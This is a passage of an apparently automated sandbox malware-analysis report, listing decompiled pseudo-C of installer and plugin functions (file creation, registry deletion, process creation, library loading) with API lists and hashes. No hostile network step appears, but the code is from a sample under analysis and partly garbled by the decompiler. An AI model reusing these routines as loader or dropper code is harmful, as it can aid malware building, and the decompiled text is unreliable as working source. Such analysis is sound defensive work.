                                                            						_t85 = _t49;
                                                            						L13:
                                                            						goto L14;
                                                            					}
                                                            					_t50 = _t49 - 1;
                                                            					if(_t50 == 0) {
                                                            						L8:
                                                            						_t49 = E73C22BC4(_t85); // executed
                                                            						goto L12;
                                                            					}
                                                            					_t51 = _t50 - 1;
                                                            					if(_t51 == 0) {
                                                            						_push(_t85);
                                                            						E73C21774();
                                                            						goto L13;
                                                            					}
                                                            					if(_t51 != 1) {
                                                            						goto L14;
                                                            					}
                                                            					goto L8;
                                                            				}
                                                            			}




















                                                            APIs
                                                              • Part of subcall function 73C22288: GlobalFree.KERNEL32(?), ref: 73C22901
                                                              • Part of subcall function 73C22288: GlobalFree.KERNEL32(?), ref: 73C22907
                                                              • Part of subcall function 73C22288: GlobalFree.KERNEL32(?), ref: 73C2290D
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C216B8
                                                            • FreeLibrary.KERNEL32(?), ref: 73C21743
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C21769
                                                              • Part of subcall function 73C21EDD: GlobalAlloc.KERNEL32(00000040,?), ref: 73C21F0C
                                                              • Part of subcall function 73C21774: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,73C21688,00000000), ref: 73C21817
                                                              • Part of subcall function 73C21E71: wsprintfA.USER32 ref: 73C21EA4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                            • String ID:
                                                            • API String ID: 3962662361-0
                                                            • Opcode ID: 7b2daeb0207d7108c4f629dffda72d1afb4130357d6de7775ae1673df354db02
                                                            • Instruction ID: d99aad3fdf7b1f11d15cedd492fdcb3d5e15e34be4f6efbb66f85bd10c4ec8d1
                                                            • Opcode Fuzzy Hash: 7b2daeb0207d7108c4f629dffda72d1afb4130357d6de7775ae1673df354db02
                                                            • Instruction Fuzzy Hash: 20418F7240034DAFDB51EF298C44B9A3FFDFB41623F198129E94ADE181CB75A944CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401B87(void* __ebx, void* __edx) {
                                                            				intOrPtr _t7;
                                                            				void* _t8;
                                                            				void _t11;
                                                            				void* _t13;
                                                            				void* _t21;
                                                            				void* _t24;
                                                            				void* _t30;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            				void* _t37;
                                                            
                                                            				_t27 = __ebx;
                                                            				_t7 =  *((intOrPtr*)(_t37 - 0x20));
                                                            				_t30 =  *0x414478; // 0x0
                                                            				if(_t7 == __ebx) {
                                                            					if(__edx == __ebx) {
                                                            						_t8 = GlobalAlloc(0x40, 0x2004); // executed
                                                            						_t34 = _t8;
                                                            						_t4 = _t34 + 4; // 0x4
                                                            						E004062EA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
                                                            						_t11 =  *0x414478; // 0x0
                                                            						 *_t34 = _t11;
                                                            						 *0x414478 = _t34;
                                                            					} else {
                                                            						if(_t30 == __ebx) {
                                                            							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                            						} else {
                                                            							_t2 = _t30 + 4; // 0x4
                                                            							E00406257(_t33, _t2);
                                                            							_push(_t30);
                                                            							 *0x414478 =  *_t30;
                                                            							GlobalFree();
                                                            						}
                                                            					}
                                                            					goto L15;
                                                            				} else {
                                                            					while(1) {
                                                            						_t7 = _t7 - 1;
                                                            						if(_t30 == _t27) {
                                                            							break;
                                                            						}
                                                            						_t30 =  *_t30;
                                                            						if(_t7 != _t27) {
                                                            							continue;
                                                            						} else {
                                                            							if(_t30 == _t27) {
                                                            								break;
                                                            							} else {
                                                            								_t32 = _t30 + 4;
                                                            								E00406257(0x40a438, _t30 + 4);
                                                            								_t21 =  *0x414478; // 0x0
                                                            								E00406257(_t32, _t21 + 4);
                                                            								_t24 =  *0x414478; // 0x0
                                                            								_push(0x40a438);
                                                            								_push(_t24 + 4);
                                                            								E00406257();
                                                            								L15:
                                                            								 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t37 - 4));
                                                            								_t13 = 0;
                                                            							}
                                                            						}
                                                            						goto L17;
                                                            					}
                                                            					_push(0x200010);
                                                            					_push(E004062EA(_t27, _t30, _t33, _t27, 0xffffffe8));
                                                            					E0040596D();
                                                            					_t13 = 0x7fffffff;
                                                            				}
                                                            				L17:
                                                            				return _t13;
                                                            			}














                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 00401BF6
                                                            • GlobalAlloc.KERNELBASE(00000040,00002004), ref: 00401C08
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree
                                                            • String ID: Call
                                                            • API String ID: 3394109436-1824292864
                                                            • Opcode ID: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction ID: d2b80980e39293206c5e6d60a34a0b6bee3a2bd2daddf4a89311edae202359af
                                                            • Opcode Fuzzy Hash: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction Fuzzy Hash: 3E215E72600100A7E720FBA4DD89D9E73A59B89319B25443FF152F72D1D77CD8518B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004022F3() {
                                                            				char _t32;
                                                            				CHAR* _t35;
                                                            				CHAR* _t37;
                                                            				void* _t39;
                                                            
                                                            				_t37 = E00402C39(_t32);
                                                            				_t35 = E00402C39(0x11);
                                                            				 *((intOrPtr*)(_t39 + 8)) = E00402C39(0x23);
                                                            				if(E004065CE(_t37) != 0) {
                                                            					 *(_t39 - 0x54) =  *(_t39 - 8);
                                                            					 *((intOrPtr*)(_t39 - 0x50)) = 2;
                                                            					( &(_t37[1]))[lstrlenA(_t37)] = _t32;
                                                            					( &(_t35[1]))[lstrlenA(_t35)] = _t32;
                                                            					_t25 =  *((intOrPtr*)(_t39 + 8));
                                                            					 *(_t39 - 0x4c) = _t37;
                                                            					 *(_t39 - 0x48) = _t35;
                                                            					 *((intOrPtr*)(_t39 - 0x3a)) =  *((intOrPtr*)(_t39 + 8));
                                                            					 *((short*)(_t39 - 0x44)) =  *((intOrPtr*)(_t39 - 0x20));
                                                            					E00405378(_t32, _t25);
                                                            					if(SHFileOperationA(_t39 - 0x54) != 0) {
                                                            						goto L1;
                                                            					}
                                                            				} else {
                                                            					L1:
                                                            					E00405378(0xfffffff9, _t32); // executed
                                                            					 *((intOrPtr*)(_t39 - 4)) = 1;
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t39 - 4));
                                                            				return 0;
                                                            			}








                                                            APIs
                                                              • Part of subcall function 004065CE: FindFirstFileA.KERNELBASE(00000020,004480E0,00446098,00405D1A,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 004065D9
                                                              • Part of subcall function 004065CE: FindClose.KERNELBASE(00000000), ref: 004065E5
                                                            • lstrlenA.KERNEL32 ref: 00402333
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040233D
                                                            • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402365
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                            • String ID:
                                                            • API String ID: 1486964399-0
                                                            • Opcode ID: 053537b90b94227762147015232e5ec5979310bb3674d4cdadc8849d194cb865
                                                            • Instruction ID: bdcadd7e5dff747a6480a3611f7c4249811e34a0dd3bad8b9c8728891d0ecdbb
                                                            • Opcode Fuzzy Hash: 053537b90b94227762147015232e5ec5979310bb3674d4cdadc8849d194cb865
                                                            • Instruction Fuzzy Hash: B1115E71D04308AADB10EFB58A4999EB6B8AF04314F20447FB401F72C1D6BCC5018B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401389(signed int _a4) {
                                                            				intOrPtr* _t6;
                                                            				void* _t8;
                                                            				void* _t10;
                                                            				signed int _t11;
                                                            				void* _t12;
                                                            				signed int _t16;
                                                            				signed int _t17;
                                                            				void* _t18;
                                                            
                                                            				_t17 = _a4;
                                                            				while(_t17 >= 0) {
                                                            					_t6 = _t17 * 0x1c +  *0x452450;
                                                            					if( *_t6 == 1) {
                                                            						break;
                                                            					}
                                                            					_push(_t6); // executed
                                                            					_t8 = E00401434(); // executed
                                                            					if(_t8 == 0x7fffffff) {
                                                            						return 0x7fffffff;
                                                            					}
                                                            					_t10 = E0040136D(_t8);
                                                            					if(_t10 != 0) {
                                                            						_t11 = _t10 - 1;
                                                            						_t16 = _t17;
                                                            						_t17 = _t11;
                                                            						_t12 = _t11 - _t16;
                                                            					} else {
                                                            						_t12 = _t10 + 1;
                                                            						_t17 = _t17 + 1;
                                                            					}
                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                            						 *0x44e40c =  *0x44e40c + _t12;
                                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x44e40c, 0x7530,  *0x44e3f4), 0); // executed
                                                            					}
                                                            				}
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction ID: 797ac5eab5bd55ce3963157cabd24902f5215075ef1b0f0e1f2fe658c051a2dc
                                                            • Opcode Fuzzy Hash: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction Fuzzy Hash: 0A01D1316242209BE7094B399D08B2A3798F711318F10823FB851F61F1D678CC129B4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402429(void* __ebx, void* __edx) {
                                                            				long _t6;
                                                            				void* _t13;
                                                            				long _t18;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            
                                                            				_t13 = __ebx;
                                                            				_t26 =  *(_t23 - 0x18) - __ebx;
                                                            				_t20 = __edx;
                                                            				if( *(_t23 - 0x18) != __ebx) {
                                                            					_t6 = E00402CF7(_t20, E00402C39(0x22),  *(_t23 - 0x18) >> 1); // executed
                                                            					_t18 = _t6;
                                                            					goto L4;
                                                            				} else {
                                                            					_t22 = E00402C79(_t26, 2);
                                                            					if(_t22 == __ebx) {
                                                            						L6:
                                                            						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                            					} else {
                                                            						_t18 = RegDeleteValueA(_t22, E00402C39(0x33));
                                                            						RegCloseKey(_t22);
                                                            						L4:
                                                            						if(_t18 != _t13) {
                                                            							goto L6;
                                                            						}
                                                            					}
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t23 - 4));
                                                            				return 0;
                                                            			}










                                                            APIs
                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 0040244A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteValue
                                                            • String ID:
                                                            • API String ID: 2831762973-0
                                                            • Opcode ID: 89043e2fe8687ce586435c5a551923b9262886b562137b10a05521ca1fbc2108
                                                            • Instruction ID: 34235f3b1f430fbf497285b3b61430caa7c9be3a8a673b0b08f99ec2f467b38a
                                                            • Opcode Fuzzy Hash: 89043e2fe8687ce586435c5a551923b9262886b562137b10a05521ca1fbc2108
                                                            • Instruction Fuzzy Hash: 4FF0F632A04120ABE710ABB49B8E9AE62A89B40314F25043FF202B31C1DAF84D41966E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0040544A(signed int __eax) {
                                                            				intOrPtr _v0;
                                                            				intOrPtr _t10;
                                                            				intOrPtr _t11;
                                                            				intOrPtr* _t12;
                                                            
                                                            				_t11 =  *0x452448;
                                                            				_t10 =  *0x45244c;
                                                            				__imp__OleInitialize(0); // executed
                                                            				 *0x4524e0 =  *0x4524e0 | __eax;
                                                            				E00404320(0);
                                                            				if(_t10 != 0) {
                                                            					_t12 = _t11 + 0xc;
                                                            					while(1) {
                                                            						_t10 = _t10 - 1;
                                                            						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                            							break;
                                                            						}
                                                            						_t12 = _t12 + 0x2018;
                                                            						if(_t10 != 0) {
                                                            							continue;
                                                            						} else {
                                                            						}
                                                            						goto L7;
                                                            					}
                                                            					 *0x4524ac =  *0x4524ac + 1;
                                                            				}
                                                            				L7:
                                                            				E00404320(0x404);
                                                            				__imp__OleUninitialize();
                                                            				return  *0x4524ac;
                                                            			}








                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0040545A
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            • OleUninitialize.OLE32 ref: 004054A6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction ID: 605ee913eaad74fb131c45803b2287184ab1d6587fbed753920360c824042bb4
                                                            • Opcode Fuzzy Hash: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction Fuzzy Hash: 43F0F073500B00ABE6409704EE01BAA7360EB82317F09403BEE44722A2D7B588458A5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401A1E(char __ebx) {
                                                            				CHAR* _t7;
                                                            				long _t8;
                                                            				char _t12;
                                                            				CHAR* _t17;
                                                            				void* _t19;
                                                            
                                                            				_t12 = __ebx;
                                                            				_t7 = E00402C39(1);
                                                            				 *(_t19 + 8) = _t7;
                                                            				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x2000); // executed
                                                            				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x20)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
                                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                            					 *_t17 = _t12;
                                                            				}
                                                            				_t17[0x1fff] = _t12;
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
                                                            				return 0;
                                                            			}









                                                            APIs
                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00002000,00000001), ref: 00401A31
                                                            • lstrcmpA.KERNEL32(?,?,?,00002000,00000001), ref: 00401A44
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                            • String ID:
                                                            • API String ID: 1938659011-0
                                                            • Opcode ID: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction ID: 0c80c25ae6124d08632ca9112a85281756203997caa87babcc69875add3a12a2
                                                            • Opcode Fuzzy Hash: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction Fuzzy Hash: E1F08231705201EBDB20DF769D48A9FBFA5EF92350710843FE145F6191D7788501CA68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableShow
                                                            • String ID:
                                                            • API String ID: 1136574915-0
                                                            • Opcode ID: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction ID: 95492d4cb058fd8d3dfd6bdd8f68eb7ce1d8cbcbb3bb97f8bbdf30dd964bc089
                                                            • Opcode Fuzzy Hash: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction Fuzzy Hash: 12E01272A08200AFD714EBA5AA8956EB7B4EB81365B20443FF101F11D1DBB858408A69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004058F0(CHAR* _a4) {
                                                            				struct _PROCESS_INFORMATION _v20;
                                                            				int _t7;
                                                            
                                                            				0x448098->cb = 0x44;
                                                            				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x448098,  &_v20); // executed
                                                            				if(_t7 != 0) {
                                                            					CloseHandle(_v20.hThread);
                                                            					return _v20.hProcess;
                                                            				}
                                                            				return _t7;
                                                            			}






                                                            APIs
                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00448098,00000009), ref: 00405919
                                                            • CloseHandle.KERNEL32(?), ref: 00405926
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-0
                                                            • Opcode ID: e1a7a9ac90590d15bdee2503b36fc35e0cb6cc366dcef6355b673084c93cbe07
                                                            • Instruction ID: c85fa0b22c9836a092614b3cfedc81871d8257a1e0135e40e7aa539d8c7996b4
                                                            • Opcode Fuzzy Hash: e1a7a9ac90590d15bdee2503b36fc35e0cb6cc366dcef6355b673084c93cbe07
                                                            • Instruction Fuzzy Hash: F6E0B6F4610209BFEB109B64ED4AF7F7BBCEB04704F114425BE59F2290DA7498189E78
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406663(signed int _a4) {
                                                            				struct HINSTANCE__* _t5;
                                                            				signed int _t10;
                                                            
                                                            				_t10 = _a4 << 3;
                                                            				_t8 =  *(_t10 + 0x40a240);
                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                            				if(_t5 != 0) {
                                                            					L2:
                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                            				}
                                                            				_t5 = E004065F5(_t8); // executed
                                                            				if(_t5 == 0) {
                                                            					return 0;
                                                            				}
                                                            				goto L2;
                                                            			}






                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                              • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                              • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                              • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                            • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00405DEA(CHAR* _a4, long _a8, long _a12) {
                                                            				signed int _t5;
                                                            				void* _t6;
                                                            
                                                            				_t5 = GetFileAttributesA(_a4); // executed
                                                            				asm("sbb ecx, ecx");
                                                            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                            				return _t6;
                                                            			}






                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                            • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405DC5(CHAR* _a4) {
                                                            				signed char _t3;
                                                            				signed char _t7;
                                                            
                                                            				_t3 = GetFileAttributesA(_a4); // executed
                                                            				_t7 = _t3;
                                                            				if(_t7 != 0xffffffff) {
                                                            					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                            				}
                                                            				return _t7;
                                                            			}






                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                            • Instruction ID: 1444cfec4ca9bf1d34442b2169c12043b22736e773fd5239433e8f32ad8d098d
                                                            • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                            • Instruction Fuzzy Hash: 6FD0C972504421ABC6112728EE0C89BBB55DB54271702CA36FDA5A26B1DB304C569A98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004058BB(CHAR* _a4) {
                                                            				int _t2;
                                                            
                                                            				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                            				if(_t2 == 0) {
                                                            					return GetLastError();
                                                            				}
                                                            				return 0;
                                                            			}





                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction ID: 3fc85bafe69b7557593d5765bf5919c43deceba34b0c9ea4212deea00e127d8c
                                                            • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction Fuzzy Hash: 34C04C31214601EED6106B219E08B177BE5AB50741F25843E6646F00A0DE388469DA2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 22%
                                                            			E73C22BC4(intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				void* __ebx;
                                                            				void* _t28;
                                                            				void* _t29;
                                                            				void* _t33;
                                                            				void* _t37;
                                                            				void* _t44;
                                                            				void* _t47;
                                                            				signed int _t53;
                                                            				void* _t58;
                                                            				intOrPtr _t64;
                                                            				intOrPtr _t67;
                                                            				signed int _t72;
                                                            				intOrPtr _t74;
                                                            				intOrPtr _t75;
                                                            				signed int _t78;
                                                            				void* _t80;
                                                            				void* _t81;
                                                            				void* _t82;
                                                            				void* _t83;
                                                            				intOrPtr _t86;
                                                            				intOrPtr _t87;
                                                            
                                                            				if( *0x73c25024 != 0 && E73C21B3E(_a4) == 0) {
                                                            					 *0x73c25030 = _t86;
                                                            					if( *0x73c25034 != 0) {
                                                            						_t86 =  *0x73c25034;
                                                            					} else {
                                                            						E73C23100(E73C21BA7());
                                                            						 *0x73c25034 = _t86;
                                                            					}
                                                            				}
                                                            				_t28 = E73C21BAD(_a4);
                                                            				_t87 = _t86 + 4;
                                                            				if(_t28 <= 0) {
                                                            					L9:
                                                            					_t29 = E73C21B38();
                                                            					_t67 = _a4;
                                                            					_t74 =  *0x73c25028;
                                                            					 *((intOrPtr*)(_t29 + _t67)) = _t74;
                                                            					 *0x73c25028 = _t67;
                                                            					E73C21BBE();
                                                            					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
                                                            					 *0x73c25000 = _t33;
                                                            					 *0x73c25004 = _t74;
                                                            					if( *0x73c25024 != 0 && E73C21B3E( *0x73c25028) == 0) {
                                                            						 *0x73c25034 = _t87;
                                                            						_t87 =  *0x73c25030;
                                                            					}
                                                            					_t75 =  *0x73c25028;
                                                            					_a4 = _t75;
                                                            					 *0x73c25028 =  *((intOrPtr*)(E73C21B38() + _t75));
                                                            					_t37 = E73C21B2A(_t75);
                                                            					_pop(_t76);
                                                            					if(_t37 != 0) {
                                                            						_t37 = E73C21BAD(_t76);
                                                            						if(_t37 > 0) {
                                                            							_push(_t37);
                                                            							_push(E73C21BB8() + _a4 + _v8);
                                                            							_push(E73C21BC8());
                                                            							if( *0x73c25024 <= 0 || E73C21B3E(_a4) != 0) {
                                                            								_pop(_t81);
                                                            								_pop(_t44);
                                                            								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
                                                            								}
                                                            								_pop(_t76);
                                                            								_t37 = _t44 + _v8;
                                                            								asm("loop 0xfffffff5");
                                                            							} else {
                                                            								_pop(_t82);
                                                            								_pop(_t47);
                                                            								_t78 =  *(_t47 + _t82);
                                                            								_t64 =  *0x73c25034;
                                                            								_t76 = _t64 + _t78 * 4;
                                                            								 *0x73c25034 = _t64 + _t78 * 4;
                                                            								_t37 = _t47 + _v8;
                                                            								asm("loop 0xffffffeb");
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *0x73c25028 == 0) {
                                                            						 *0x73c25034 = 0;
                                                            					}
                                                            					_push( *0x73c25004);
                                                            					E73C22B72(_t37, _t64, _t76, _a4,  *0x73c25000);
                                                            					return _a4;
                                                            				}
                                                            				_push(E73C21BB8() + _a4);
